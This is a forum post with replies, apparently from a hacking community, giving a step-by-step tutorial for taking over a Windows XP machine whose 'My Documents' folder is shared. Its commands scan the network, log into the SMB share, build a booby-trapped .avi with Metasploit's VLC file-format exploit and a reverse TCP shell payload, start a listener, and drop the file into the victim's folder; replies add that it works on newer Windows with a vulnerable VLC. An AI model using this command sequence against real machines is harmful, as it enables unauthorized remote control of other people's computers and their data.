Owning a Windows XP with a shared folder.
Blip.tv video: Sickness - Owning a windows xp with metasploit
Blog: http://sickness.tor.hu/?p=259
Ok so first of all I did not do any video editing, so don't complain about it !
Second of all excuse me if I made some English mistakes I'm not a perfect English speaker.
Third this is a basic video.
So in this tutorial I am going to show you how to own a windows XP SP2 who has the folder "My Documents" shared with read/write permissions by uploading an infected .avi file to the victim's machine.
The tools used: fping, nmap, metasploit, inguma
Commands:
Code:
fping -g 192.168.1.60 192.168.1.70
nmap -sS -sV -f -n -O 192.168.1.66
cd /pentest/exploits/framework3/
./msfconsole
cd /pentest/exploits/inguma
./inguma.py
autoscan
192.168.1.66
y
n
cd /pentest/python/impacket-examples/
./smbclient
open 192.168.1.66
login username password
shares
smbmount //192.168.1.66/Documents /media/
cd /media/
ls
Metasploit commands (making the infected .avi):
Code:
search vlc
use windows/fileformat/videolan_tivo
set PAYLOAD windows/shell_reverse_tcp
show options
set FILENAME watch_me.avi
set OUTPUTPATH /root/sickness/desktop/
set LHOST 192.168.1.64
exploit
Metasploit handler:
Code:
use exploit/multi/handler
set PAYLOAD windows/shell_reverse_tcp
set LHOST 192.168.1.64
exploit
Code:
cd /root/sickness/desktop
mv -f watch_me.avi /media/Downloads
smbumount /media
Re: Owning a Windows XP with a shared folder.
nice video man keep it on :D
Re: Owning a Windows XP with a shared folder.
Great Video!
Does this only work for XP or can you do the same thing with Vista or 7?
Re: Owning a Windows XP with a shared folder.
Well it depends on the VLC version :) so if you have the vulnerable VLC version it should work on Vista or 7
Re: Owning a Windows XP with a shared folder.
Re: Owning a Windows XP with a shared folder.
10x alot man it's great!!
Re: Owning a Windows XP with a shared folder.
good job man .. keep it on
